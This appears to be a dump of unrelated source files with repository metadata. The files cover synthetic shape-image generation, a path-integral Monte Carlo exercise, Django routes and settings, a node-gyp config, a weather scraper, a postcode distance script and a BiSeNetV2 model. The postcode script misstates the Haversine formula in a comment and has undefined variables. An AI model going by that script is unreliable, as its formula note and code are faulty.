starts = np.random.uniform(np.stack([x_lows, y_lows], axis=1), np.stack([x_highs, y_highs], axis=1), [n_images, 2])
ends = starts + np.stack([diameters, diameters], axis=1)
starts = starts.astype(np.uint32)
ends = ends.astype(np.uint32)
for i in range(n_images):
imgdata = images[i]
img = Image.frombuffer("L", imgdata.shape, imgdata)
img.readonly = False
d = ImageDraw.Draw(img)
d.ellipse([tuple(starts[i]), tuple(ends[i])], fill=0, outline=255, width=6)
def triangle(images, min_size=48, max_size=48):
n_images = images.shape[0]
image_width = images.shape[1]
image_height = images.shape[2]
# two triangle sides
lengths = np.random.uniform(min_size, max_size, [n_images, 2])
# orientation
directions = np.random.uniform(-np.pi, np.pi, n_images)
# inner angle, narrow to equilateral
inner_angles = np.random.uniform(2*np.pi* 1/6, 2*np.pi * 1/6, n_images)
line1x = lengths[:, 0] * np.cos(directions)
line1y = lengths[:, 0] * np.sin(directions)
line2x = lengths[:, 1] * np.cos(directions + inner_angles)
line2y = lengths[:, 1] * np.sin(directions + inner_angles)
# bounding box relative to start point
width_low = np.minimum(0, np.minimum(line1x, line2x))
width_high = np.maximum(0, np.maximum(line1x, line2x))
height_low = np.minimum(0, np.minimum(line1y, line2y))
height_high = np.maximum(0, np.maximum(line1y, line2y))
x_lows = np.clip(-width_low+1, 1, image_width-1)
x_highs = np.clip(image_width-width_high-1, 1, image_width-1)
y_lows = np.clip(-height_low+1, 1, image_height-1)
y_highs = np.clip(image_height-height_high-1, 1, image_height-1)
starts = np.random.uniform(np.stack([x_lows, y_lows], axis=1), np.stack([x_highs, y_highs], axis=1), [n_images, 2])
point1 = starts + np.stack([line1x, line1y], axis=1)
point2 = starts + np.stack([line2x, line2y], axis=1)
starts = starts.astype(np.uint32)
point1 = point1.astype(np.uint32)
point2 = point2.astype(np.uint32)
for i in range(n_images):
imgdata = images[i]
img = Image.frombuffer("L", imgdata.shape, imgdata)
img.readonly = False
d = ImageDraw.Draw(img)
d.line([tuple(starts[i]), tuple(point1[i])], fill=255, width=6)
d.line([tuple(point1[i]), tuple(point2[i])], fill=255, width=6)
d.line([tuple(starts[i]), tuple(point2[i])], fill=255, width=6)
# make a convenient structure for our data
def create_dataset_obj(x_all, y_all, z_all, n_classes):
x_all = tf.convert_to_tensor(x_all)
y_all = tf.convert_to_tensor(y_all)
z_all = tf.convert_to_tensor(z_all)
inds = np.random.permutation(len(x_all))
n_all = len(x_all)
n_test = len(x_all) // 10
n_val = len(x_all) // 10
n_train = n_all - n_test - n_val
# 80% train : 10% val : 10% test split
train_indices = inds[:n_train]
val_indices = inds[n_train:n_train+n_val]
test_indices = inds[n_train+n_val:n_train+n_val+n_test]
return {
"image_size": x_all.shape[1],
"n_classes": n_classes,
"n_all": len(x_all),
"x_all": x_all,
"y_all": y_all,
"n_z": len(z_all),
"z_all": z_all,
"n_train": len(train_indices),
"x_train": tf.gather(x_all, train_indices),
"y_train": tf.gather(y_all, train_indices),
"n_val": len(val_indices),
"x_val": tf.gather(x_all, val_indices),
"y_val": tf.gather(y_all, val_indices),
"n_test": len(test_indices),
"x_test": tf.gather(x_all, test_indices),
"y_test": tf.gather(y_all, test_indices),
}
def make_image_dataset(n_x_data, n_z_data=2000, image_size=24, latent_dims=6, pixel_dtype=np.uint8):
n_classes = len(list(all_classes()))
n_per_class = n_x_data // n_classes
params = [par for par in all_classes()] * n_per_class
class_labels = np.identity(n_classes)
classes = [class_labels[i] for i, par in enumerate(all_classes())] * n_per_class
# class1_labels = np.identity(len(shape_types))
# class2_labels = np.identity(len(line_types))
# class3_labels = np.identity(len(colors))
# tclasses = [
# (class1_labels[shape_types.index(shape_type)], class2_labels[line_types.index(line_type)], class3_labels[colors.index(color)]) for shape_type, line_type, color in all_classes()
# ] * n_per_class
draw_size = 200
resize_to = image_size
line_width = draw_size / 25
min_radius = line_width * 6
max_radius = min_radius * 1.5
images = shapes(params, draw_size, resize_to, min_radius=min_radius, max_radius=max_radius, line_width=line_width)
gaussian_z = tf.random.normal([n_z_data, latent_dims])
return create_dataset_obj(images, classes, gaussian_z, n_classes)
|
[
"maxeonyx@gmail.com"
] |
maxeonyx@gmail.com
|
abdd045c9ecaae3f016d3bcef6a016289fa19727
|
d32d094e50f7173d73c01599687287b864e96fb1
|
/wk6/assignment/b2.py
|
915f9718238977b34070b470b7967ea5732f709f
|
[] |
no_license
|
grasingerm/statsmek
|
7eae64267640a09ac4cc16c565e99d248e65585e
|
9f9cb39417d4cf0e6ce87f64ee92b36a077c319d
|
refs/heads/master
| 2020-04-05T23:29:00.805244
| 2017-12-18T21:31:11
| 2017-12-18T21:31:11
| 60,022,949
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,546
|
py
|
import math, random, pylab
def rho_free(x, y, beta):
return math.exp(-(x - y)**2 / (2.0 * beta))
def levy_harmonic_path(xstart, xend, dtau, N):
x = [xstart]
for k in range(1, N):
dtau_prime = (N - k) * dtau
Ups1 = 1.0 / math.tanh(dtau) + 1.0 / math.tanh(dtau_prime)
Ups2 = x[k-1] / math.sinh(dtau) + xend / math.sinh(dtau_prime)
x.append(random.gauss(Ups2 / Ups1, 1.0 / math.sqrt(Ups1)))
return x
beta = 20.0
N = 2
Ncut = N / 2
dtau = beta / N
delta = 1.0
n_steps = 1000000
x = [5.0] * N
data = []
for step in range(n_steps):
x = levy_harmonic_path(x[0], x[0], dtau, N)
x = x[Ncut:] + x[:Ncut]
if step % N == 0:
k = random.randint(0, N-1)
data.append(x[k])
if step % 100000 == 0:
print 'step ', step
final_path = x[:]
pylab.hist(data, normed=True, bins=100, label='QMC')
list_x = [0.1 * a for a in range(-30, 31)]
list_y = [math.sqrt(math.tanh(beta / 2.0)) / math.sqrt(math.pi) * \
math.exp(-x ** 2 * math.tanh(beta / 2.0)) for x in list_x]
pylab.plot(list_x, list_y, label='analytic')
pylab.legend()
pylab.xlabel('$x$')
pylab.ylabel('$\\pi(x)$ (normalized)')
pylab.title('levy_harmonic_path ($\\beta=%s, N=%i$)' % (beta, N))
pylab.xlim(-2, 2)
pylab.savefig('plot_B2_beta%s.png' % beta)
pylab.show()
pylab.clf()
pylab.plot(final_path, [dtau * n for n in range(N)])
pylab.xlabel('$x$')
pylab.ylabel('$\\tau$')
pylab.title('levy_harmonic_path ($\\beta=%s, N=%i$)' % (beta, N))
pylab.savefig('plot_B2_beta%s_final-path.png' % beta)
pylab.show()
|
[
"grasingerm@gmail.com"
] |
grasingerm@gmail.com
|
b2c92dde453dc89b535d08529a505c032ea3554c
|
a0e9dbb155d5b7f82bb3dea38ce63e37f8a916d7
|
/LaLune/urls.py
|
ca677ae63f06e5a146f9ad1cf0e2b37b04916c33
|
[] |
no_license
|
eminam98/lalune
|
792ac9a66c5b1e9fd6086706a31f44bb4f943a6b
|
9fc10ec3342e3f16b76b85bddf82b9163a97c121
|
refs/heads/master
| 2022-12-26T22:56:21.098397
| 2020-10-11T20:01:30
| 2020-10-11T20:01:30
| 302,958,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,771
|
py
|
from django.urls import path
from .import views
from django.conf import settings
from django.conf.urls.static import static
from django.contrib.auth import views as auth_views
urlpatterns = [
path('', views.home, name='home'),
path('about/', views.about, name='about'),
path('faq/', views.faq, name='faq'),
path('politika/', views.politika, name='politika'),
path('naruciti/', views.naruciti, name='naruciti'),
path('register/', views.UserFormView.as_view(), name='register'),
path('login/', auth_views.LoginView.as_view(template_name='LaLune/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='LaLune/logout.html'), name='logout'),
path('profile/', views.profile, name='profil'),
path('contact/', views.contact, name='kontakt'),
path('galerija/', views.galerija, name='galerija'),
path('proizvodi/', views.store, name="proizvodi"),
path('oci/', views.oci, name="oci"),
path('lice/', views.lice, name="lice"),
path('usne/', views.usne, name="usne"),
path('korpa/', views.cart, name="korpa"),
path('checkout/', views.checkout, name="checkout"),
path('proizvodi/update_item/', views.updateItem, name="update_item"),
path('korpa/update_item/', views.updateItem, name="update_item"),
path('oci/update_item/', views.updateItem, name="update_item"),
path('usne/update_item/', views.updateItem, name="update_item"),
path('lice/update_item/', views.updateItem, name="update_item"),
path('checkout/process_order/', views.processOrder, name="process_order"),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"ryuzakiemy@gmail.com"
] |
ryuzakiemy@gmail.com
|
6307442c7594a2db8145b1a4f113bc74e4b77908
|
efd5481d02f77de1b7b9630c2a2781f03f8b9edc
|
/node_modules/mongojs/node_modules/mongodb/node_modules/kerberos/build/config.gypi
|
3bcdbb1c39ae78842ab15e4ef1681a008aba1a48
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
prashant-git/rss-reader
|
7b007ce6645726b53f7ad675e13cf24fa1e58f69
|
43bb9cea44555f76aa63594ccd06f0984c11926a
|
refs/heads/master
| 2020-05-20T09:32:03.865246
| 2014-02-07T10:40:49
| 2014-02-07T10:40:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,015
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 0,
"gcc_version": 48,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_systemtap": "false",
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/home/samphal/.node-gyp/0.10.24",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"cache_lock_stale": "60000",
"sign_git_tag": "",
"always_auth": "",
"user_agent": "node/v0.10.24 linux x64",
"bin_links": "true",
"key": "",
"description": "true",
"fetch_retries": "2",
"heading": "npm",
"user": "",
"force": "",
"cache_min": "10",
"init_license": "ISC",
"editor": "vi",
"rollback": "true",
"cache_max": "null",
"userconfig": "/home/samphal/.npmrc",
"engine_strict": "",
"init_author_name": "",
"init_author_url": "",
"tmp": "/home/samphal/tmp",
"depth": "null",
"save_dev": "",
"usage": "",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/usr/local",
"registry": "https://registry.npmjs.org/",
"browser": "",
"cache_lock_wait": "10000",
"save_optional": "",
"searchopts": "",
"versions": "",
"cache": "/home/samphal/.npm",
"ignore_scripts": "",
"searchsort": "name",
"version": "",
"local_address": "",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "18",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"cert": "",
"global": "",
"link": "",
"save": "",
"unicode": "true",
"long": "",
"production": "",
"unsafe_perm": "true",
"node_version": "v0.10.24",
"tag": "latest",
"git_tag_version": "true",
"shrinkwrap": "true",
"fetch_retry_factor": "10",
"npat": "",
"proprietary_attribs": "true",
"strict_ssl": "true",
"username": "",
"dev": "",
"globalconfig": "/usr/local/etc/npmrc",
"init_module": "/home/samphal/.npm-init.js",
"parseable": "",
"globalignorefile": "/usr/local/etc/npmignore",
"cache_lock_retries": "10",
"group": "1000",
"init_author_email": "",
"searchexclude": "",
"git": "git",
"optional": "true",
"email": "",
"json": ""
}
}
|
[
"prashantjadhav7771@gmail.com"
] |
prashantjadhav7771@gmail.com
|
db9bdb4488364e2c1c8697da29971ab8f544268a
|
e21fa75b83dd068b55dde463c468cfe25d80d66b
|
/crawl_temperature.py
|
fe5bdd0a19d98079807c466f925ec396809cacb1
|
[] |
no_license
|
BarclayII/big-data-project
|
84e69a2c3a960db6facfa876aa8802b8b45947fc
|
5f9ed774b6948c9b507b3b1206a1ab8935ed676c
|
refs/heads/master
| 2021-01-23T03:43:06.999203
| 2017-09-08T15:43:58
| 2017-09-08T15:43:58
| 86,112,814
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,914
|
py
|
import lxml.etree as ETREE
import urllib2
import datetime
import time
def find_temperature(string):
tree = ETREE.fromstring(string, parser=ETREE.HTMLParser())
body = tree.find('body')
div = [d for d in body.findall('div') if d.attrib.get('id', None) == 'content-wrap'][0]
div = [d for d in div.findall('div') if d.attrib.get('id', None) == 'inner-wrap'][0]
section = [s for s in div.findall('section')
if s.attrib.get('id', None) == 'inner-content' and s.attrib['role'] == 'main'][0]
div = [d for d in section.findall('div') if d.attrib.get('class', None) == 'mainWrapper'][0]
div = [d for d in div.findall('div') if d.attrib.get('class', None) == 'row collapse'][1]
div = [d for d in div.findall('div') if d.attrib.get('class', None) == 'column large-8 right-spacing'][0]
table = [t for t in div.findall('table') if t.attrib.get('id', None) == 'historyTable'][0]
tbody = table.find('tbody')
tr = [r for r in tbody.findall('tr')][1]
td = [d for d in tr.findall('td')][1]
span = [s for s in td.findall('span') if s.attrib.get('class', None) == 'wx-data'][0]
span = [s for s in span.findall('span') if s.attrib.get('class', None) == 'wx-value'][0]
return span.text.strip()
template = 'https://www.wunderground.com/history/airport/KNYC/%y/%m/%d/DailyHistory.html?req_city=New+York&req_state=NY&req_statename=New+York&reqdb.zip=10001&reqdb.magic=8&reqdb.wmo=99999&MR=1'
current_date = datetime.datetime(2011, 1, 1)
end_date = datetime.datetime(2015, 12, 31)
while current_date <= end_date:
url = (
template
.replace('%y', str(current_date.year))
.replace('%m', str(current_date.month))
.replace('%d', str(current_date.day))
)
print '%s\t%s' % (str(current_date), find_temperature(urllib2.urlopen(url).read()))
current_date += datetime.timedelta(1)
time.sleep(1)
|
[
"coin2028@hotmail.com"
] |
coin2028@hotmail.com
|
67d8eef410ae22998121012c67b00809a61b9b31
|
c6adb271681e4101f09581692e70af0b18468f16
|
/INDIA/main.py
|
2679ea26f870d9a30323763630790610a5bdf2c0
|
[] |
no_license
|
madhuv-sharma/nearest-postcodes-calculator
|
b1111b2a9d22f021d9d35e2b92885e3506277ee7
|
afb122fed4dba93803b02d47644a3419f169c540
|
refs/heads/master
| 2023-06-20T17:54:56.303121
| 2021-07-31T01:12:34
| 2021-07-31T01:12:34
| 376,571,219
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,536
|
py
|
# import numpy as np # Can be used instead of 'math' module for faster calculations in 'dist' function
from math import *
import csv
'''
Based on Haversine Formula, distance between two points whose geocoordinates are (Lat1,Lon1) and (Lat2,Lon2) is given as
2r*arcsin(sqrt(sin^2((Lat2-Lat1)/2)+cos(Lat1)*cos(Lat2)+sin^2((Lon2-Lon1)/2)))
'''
def dist(lat1, lon1, lat2, lon2):
lat1, lon1, lat2, lon2 = map(radians, [lat1, lon1, lat2, lon2])
c = 2 * asin(sqrt(sin((lat2-lat1)/2)**2 + cos(lat1) * cos(lat2) * sin((lon2-lon1)/2)**2))
r = 6371.137 #Radius of Earth at equator in kilometers
return c * r
#Finding 10 Closest Pin Codes from the Given Pin Code
def closestLocations(lat1, lat2, in_file_loc):
data=[]
with open(in_file_loc, "r") as csv_file:
csv_reader=csv.reader(csv_file, delimiter=',')
for row in csv_reader:
try:
row[5]=dist(lat1, lon1, float(row[3]), float(row[4]))
except ValueError: # For entries having no geocoordinates
continue
data.append(row)
data=sorted(data, key=lambda abc:abc[5]) # Sorting the data in ascending order of distance
print("Do you want to save the output data in a file? (Enter y/n)\n")
ch=input()
if ch=='y' :
print("Output Database Location :\n")
out_file_loc=input()
try:
with open(out_file_loc, "w", newline='') as f:
csv_writer=csv.writer(f)
lc=0
for row in data:
if lc<=10:
if lc==0:
row[1]=row[1].upper()
row[2]=row[2].upper()
csv_writer.writerow(row)
lc+=1
except FileNotFoundError :
print("File not Found")
sys.exit(1)
elif ch!='n' :
print("Taking it as a no")
for row in data:
if lc<=10:
if lc==0:
row[1]=row[1].upper()
row[2]=row[2].upper()
print(row)
lc+=1
#Inputting File Location and Pin Code, checking whether they are valid, and calling the closestLocations function
def main():
print("Input Database Location :\n")
in_file_loc=input()
try:
with open(in_file_loc, "r") as csv_file:
csv_reader=csv.reader(csv_file, delimiter=',')
print("Enter Pin Code to find nearest locations - ")
pincode=int(input())
f=0
next(csv_reader, None)
for row in csv_reader:
if int(row[0]) == pincode :
lat1=float(row[3])
lon1=float(row[4])
f=1
break
if f==1 :
closestLocations(lat1, lon1, in_file_loc)
else:
print("Sorry, Pin Code is Not in the Database!")
except ValueError:
print("Wrong Input")
except FileNotFoundError :
print("File not Found")
if __name__=='__main__':
main()
|
[
"madhuvsharma1234@gmail.com"
] |
madhuvsharma1234@gmail.com
|
118f481de0590924d73beab2e7c968938599237f
|
62f3f4f5b9d1f75f96760b07ce0af1bce574a876
|
/model/bisenetv2.py
|
90ccedc6454f7f7e92fb364d3411b2b702de3be7
|
[] |
no_license
|
XinZhaoFu/lajidaima
|
bc40f1f31cd1131e9054db7c6561d40e1656a7db
|
d346ee2a2004fe19cc1b1e97d0c0d98ed9415528
|
refs/heads/main
| 2023-07-10T08:13:12.053751
| 2021-08-17T02:31:17
| 2021-08-17T02:31:17
| 365,449,584
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,716
|
py
|
from tensorflow.keras import Model
from model.utils import Con_Bn_Act, DW_Con_Bn_Act, Sep_Con_Bn_Act
from tensorflow.keras.layers import MaxPooling2D, concatenate, AveragePooling2D, Activation, \
AveragePooling2D, UpSampling2D, add, multiply
class BisenetV2(Model):
def __init__(self, detail_filters=64,
semantic_filters=None,
aggregation_filters=128,
num_class=2,
final_act='softmax'):
super(BisenetV2, self).__init__()
self.final_act = final_act
self.num_class = num_class
if semantic_filters is None:
self.semantic_filters = [16, 32, 64, 128]
else:
self.semantic_filters = semantic_filters
self.aggregation_filters = aggregation_filters
self.semantic_filters = semantic_filters
self.detail_filters = detail_filters
self.detail_branch = Detail_Branch(filters=self.detail_filters)
self.semantic_branch = Semantic_Branch(filters=16)
self.aggregation = Bilateral_Guided_Aggregation_Block(filters=self.aggregation_filters,
num_class=self.num_class,
final_act=self.final_act)
def call(self, inputs, training=None, mask=None):
detail_branch = self.detail_branch(inputs)
semantic_branch = self.semantic_branch(inputs)
out = self.aggregation([detail_branch, semantic_branch])
return out
class Detail_Branch(Model):
def __init__(self, filters=64):
super(Detail_Branch, self).__init__()
self.filters = filters
self.s1_con_1 = Con_Bn_Act(filters=self.filters,
strides=1,
name='detail_branch_s1_con_1')
self.s1_con_2 = Con_Bn_Act(filters=self.filters,
name='detail_branch_s1_con_2')
self.s2_con_1 = Con_Bn_Act(filters=self.filters,
strides=1,
name='detail_branch_s2_con_1')
self.s2_con_x2 = Con_Bn_Act(filters=self.filters,
name='detail_branch_s2_con_x2')
self.s3_con_1 = Con_Bn_Act(filters=self.filters * 2,
strides=1,
name='detail_branch_s3_con_1')
self.s3_con_x2 = Con_Bn_Act(filters=self.filters * 2,
name='detail_branch_s3_con_x2')
def call(self, inputs, training=None, mask=None):
s1_con_1 = self.s1_con_1(inputs)
s1_con_2 = self.s1_con_2(s1_con_1)
s2_con_1 = self.s2_con_1(s1_con_2)
s2_con_2 = self.s2_con_x2(s2_con_1)
s2_con_3 = self.s2_con_x2(s2_con_2)
s3_con_1 = self.s3_con_1(s2_con_3)
s3_con_2 = self.s3_con_x2(s3_con_1)
out = self.s3_con_x2(s3_con_2)
return out
class Semantic_Branch(Model):
def __init__(self, filters=16):
super(Semantic_Branch, self).__init__()
self.filters = filters
self.stem = Stem_Block(filters=self.filters)
self.s3_GE_down_1 = Gather_Expansion_Down_Block(filters=self.filters*2)
self.s3_GE_2 = Gather_Expansion_Block(filters=self.filters*2)
self.s4_GE_down_1 = Gather_Expansion_Down_Block(filters=self.filters*4)
self.s4_GE_2 = Gather_Expansion_Block(filters=self.filters*4)
self.s5_GE_down_1 = Gather_Expansion_Down_Block(filters=self.filters*8)
self.s5_GE_x3 = Gather_Expansion_Block(filters=self.filters*8)
self.s5_CE = Context_Embedding_Block(filters=self.filters*8)
def call(self, inputs, training=None, mask=None):
stem = self.stem(inputs)
s3_GE_down_1 = self.s3_GE_down_1(stem)
s3_GE_2 = self.s3_GE_2(s3_GE_down_1)
s4_GE_down_1 = self.s4_GE_down_1(s3_GE_2)
s4_GE_2 = self.s4_GE_2(s4_GE_down_1)
s5_GE_down_1 = self.s5_GE_down_1(s4_GE_2)
s5_GE_2 = self.s5_GE_x3(s5_GE_down_1)
s5_GE_3 = self.s5_GE_x3(s5_GE_2)
s5_GE_4 = self.s5_GE_x3(s5_GE_3)
out = self.s5_CE(s5_GE_4)
return out
class Stem_Block(Model):
def __init__(self, filters=16):
super(Stem_Block, self).__init__()
self.filters = filters
self.con_1 = Con_Bn_Act(filters=self.filters,
strides=2,
name='stem_block_con_1')
self.branch1_con_1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='stem_block_branch1_con_1')
self.branch1_con_2 = Con_Bn_Act(filters=self.filters,
strides=2,
name='stem_block_branch1_con_2')
self.branch2_maxpooling = MaxPooling2D(strides=2,
name='stem_block_branch2_maxpooling')
self.concat_con = Con_Bn_Act(filters=self.filters,
name='stem_block_concat_con')
def call(self, inputs, training=None, mask=None):
con_1 = self.con_1(inputs)
branch_1_con_1 = self.branch1_con_1(con_1)
branch_1_con_2 = self.branch1_con_2(branch_1_con_1)
branch_2_maxpooling = self.branch2_maxpooling(con_1)
concat = concatenate([branch_1_con_2, branch_2_maxpooling], axis=3)
out = self.concat_con(concat)
return out
class Context_Embedding_Block(Model):
def __init__(self, filters=128):
super(Context_Embedding_Block, self).__init__()
self.filters = filters
self.gapooling = AveragePooling2D(name='context_embedding_block_gapooling', padding='same')
self.con_1x1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='context_embedding_block_con_1x1')
self.up = UpSampling2D(name='context_embedding_block_up')
self.add_con_2 = Con_Bn_Act(filters=self.filters,
name='context_embedding_block_concat_con')
self.x8_up1 = UpSampling2D(size=(2, 2), name='context_embedding_block_x8_up1')
self.x8_scbr1 = Sep_Con_Bn_Act(filters=self.filters, name='context_embedding_block_x8_scbr1')
self.x8_up2 = UpSampling2D(size=(2, 2), name='context_embedding_block_x8_up2')
self.x8_scbr2 = Sep_Con_Bn_Act(filters=self.filters, name='context_embedding_block_x8_scbr2')
self.x8_up3 = UpSampling2D(size=(2, 2), name='context_embedding_block_x8_up3')
self.x8_scbr3 = Sep_Con_Bn_Act(filters=self.filters, name='context_embedding_block_x8_scbr3')
def call(self, inputs, training=None, mask=None):
gapooling = self.gapooling(inputs)
con_1x1 = self.con_1x1(gapooling)
up = self.up(con_1x1)
add_1 = add([inputs, up])
add2 = self.add_con_2(add_1)
x8_up1 = self.x8_up1(add2)
x8_scbr1 = self.x8_scbr1(x8_up1)
x8_up2 = self.x8_up2(x8_scbr1)
x8_scbr2 = self.x8_scbr2(x8_up2)
x8_up3 = self.x8_up3(x8_scbr2)
out = self.x8_scbr3(x8_up3)
return out
class Gather_Expansion_Down_Block(Model):
def __init__(self, filters, is_down1=True, is_down2=True):
super(Gather_Expansion_Down_Block, self).__init__()
self.filters = filters
self.con_3x3 = Con_Bn_Act(filters=self.filters,
name='gather_expansion_down_con_3x3')
if is_down1:
self.dw_con_3x3_1 = DW_Con_Bn_Act(filters=self.filters*6,
strides=2,
activation=None,
name='gather_expansion_down_dw_con_3x3_1')
else:
self.dw_con_3x3_1 = DW_Con_Bn_Act(filters=self.filters * 6,
activation=None,
name='gather_expansion_down_dw_con_3x3_1')
self.dw_con_3x3_2 = DW_Con_Bn_Act(filters=self.filters*6,
activation=None,
name='gather_expansion_down_dw_con_3x3_2')
self.con_1x1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='gather_expansion_down_con_1x1')
if is_down2:
self.res_dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters,
strides=2,
activation=None,
name='gather_expansion_down_res_dw_con_3x3')
else:
self.res_dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters,
activation=None,
name='gather_expansion_down_res_dw_con_3x3')
self.res_con_1x1 = Con_Bn_Act(filters=self.filters,
kernel_size=(1, 1),
name='gather_expansion_down_res_con_1x1')
self.relu = Activation('relu')
def call(self, inputs, training=None, mask=None):
con_3x3 = self.con_3x3(inputs)
dw_con_3x3_1 = self.dw_con_3x3_1(con_3x3)
dw_con_3x3_2 = self.dw_con_3x3_2(dw_con_3x3_1)
con_1x1 = self.con_1x1(dw_con_3x3_2)
res_sw_con_3x3 = self.res_dw_con_3x3(inputs)
res_con_1x1 = self.res_con_1x1(res_sw_con_3x3)
add_res = add([con_1x1, res_con_1x1])
out = self.relu(add_res)
return out
class Gather_Expansion_Block(Model):
def __init__(self, filters):
super(Gather_Expansion_Block, self).__init__()
self.filters = filters
self.con_3x3 = Con_Bn_Act(filters=self.filters,
name='gather_expansion_con_3x3')
self.dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters*6,
activation=None,
name='gather_expansion_dw_con_3x3')
self.con_1x1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='gather_expansion_con_1x1')
self.relu = Activation('relu')
def call(self, inputs, training=None, mask=None):
con_3x3 = self.con_3x3(inputs)
dw_con_3x3 = self.dw_con_3x3(con_3x3)
con_1x1 = self.con_1x1(dw_con_3x3)
add_res = add([con_1x1, inputs])
out = self.relu(add_res)
return out
class Bilateral_Guided_Aggregation_Block(Model):
def __init__(self, filters=128, num_class=151, final_act='softmax'):
super(Bilateral_Guided_Aggregation_Block, self).__init__()
self.final_act = final_act
self.num_class = num_class
self.filters = filters
self.detail_remain_1_dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters,
activation=None,
name='aggregation_detail_remain_1_dw_con_3x3')
self.detail_remain_2_con_1x1 = Con_Bn_Act(filters=self.filters,
kernel_size=(1, 1),
name='aggregation_detail_remain_2_con_1x1')
self.detail_down_1_con_3x3 = Con_Bn_Act(filters=self.filters,
strides=2,
activation=None,
name='aggregation_detail_down_1_con3x3')
self.detail_down_2_apooling = AveragePooling2D(pool_size=(3, 3),
strides=2,
padding='same',
name='aggregation_detail_down_2_apooling')
self.semantic_up_1_con_3x3 = Con_Bn_Act(filters=self.filters,
activation=None,
name='aggregation_semantic_up_1_con_3x3')
self.semantic_up_2_up_4x4 = UpSampling2D(size=(4, 4))
self.semantic_up_3_sigmoid = Activation('sigmoid')
self.semantic_remain_1_dw_con_3x3 = DW_Con_Bn_Act(filters=self.filters,
activation=None,
name='aggregation_semantic_remain_1_dw_con_3x3')
self.semantic_remain_2_con_1x1 = Con_Bn_Act(kernel_size=(1, 1),
filters=self.filters,
name='aggregation_semantic_remain_2_con_1x1')
self.semantic_remain_3_sigmoid = Activation('sigmoid')
self.semantic_up = UpSampling2D(size=(4, 4))
self.sum_con_3x3 = Con_Bn_Act(filters=self.num_class,
activation=self.final_act,
name='aggregation_sum_con_3x3')
def call(self, inputs, training=None, mask=None):
detail_branch_remain_1_dw_con_3x3 = self.detail_remain_1_dw_con_3x3(inputs[0])
detail_branch_remain_2_con_1x1 = self.detail_remain_2_con_1x1(detail_branch_remain_1_dw_con_3x3)
detail_branch_down_1_con3x3 = self.detail_down_1_con_3x3(inputs[0])
detail_branch_down_2_apooling = self.detail_down_2_apooling(detail_branch_down_1_con3x3)
semantic_branch_up_1_con_3x3 = self.semantic_up_1_con_3x3(inputs[1])
semantic_branch_up_2_up_4x4 = self.semantic_up_2_up_4x4(semantic_branch_up_1_con_3x3)
semantic_branch_up_3_sigmoid = self.semantic_up_3_sigmoid(semantic_branch_up_2_up_4x4)
semantic_branch_remain_1_dw_con_3x3 = self.semantic_remain_1_dw_con_3x3(inputs[1])
semantic_branch_remain_2_con_1x1 = self.semantic_remain_2_con_1x1(
semantic_branch_remain_1_dw_con_3x3)
semantic_branch_remain_3_sigmoid = self.semantic_remain_3_sigmoid(semantic_branch_remain_2_con_1x1)
detail_multiply = multiply([detail_branch_remain_2_con_1x1, semantic_branch_up_3_sigmoid])
semantic_multiply = multiply([semantic_branch_remain_3_sigmoid, detail_branch_down_2_apooling])
semantic_up = self.semantic_up(semantic_multiply)
detail_semantic_sum = add([detail_multiply, semantic_up])
out = self.sum_con_3x3(detail_semantic_sum)
return out
|
[
"35882457+XinZhaoFu@users.noreply.github.com"
] |
35882457+XinZhaoFu@users.noreply.github.com
|
28a1a0ac8d51073c624faefdadd5efaaa05b9f90
|
342b914e888861c41a3681d6fe90aef04ef781cb
|
/settings.py
|
70825f990482a93f5504337ee500d7863f8dba8e
|
[] |
no_license
|
varunit/cseismic2kx
|
920b64859c95ab60be5961683429550570ef7b63
|
4e7a97ef71612c343046faf58094e685ceacec41
|
refs/heads/master
| 2020-12-25T12:08:30.142306
| 2010-08-05T14:27:04
| 2010-08-05T14:27:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,909
|
py
|
# Django settings for cseismic2kx project.
import os
ROOT_DIR = os.path.dirname(__file__)
try:
import localsettings
except ImportError:
print "Define Localsettings"
raise ImportError
DEBUG = localsettings.DEBUG
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASES = localsettings.DATABASES
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
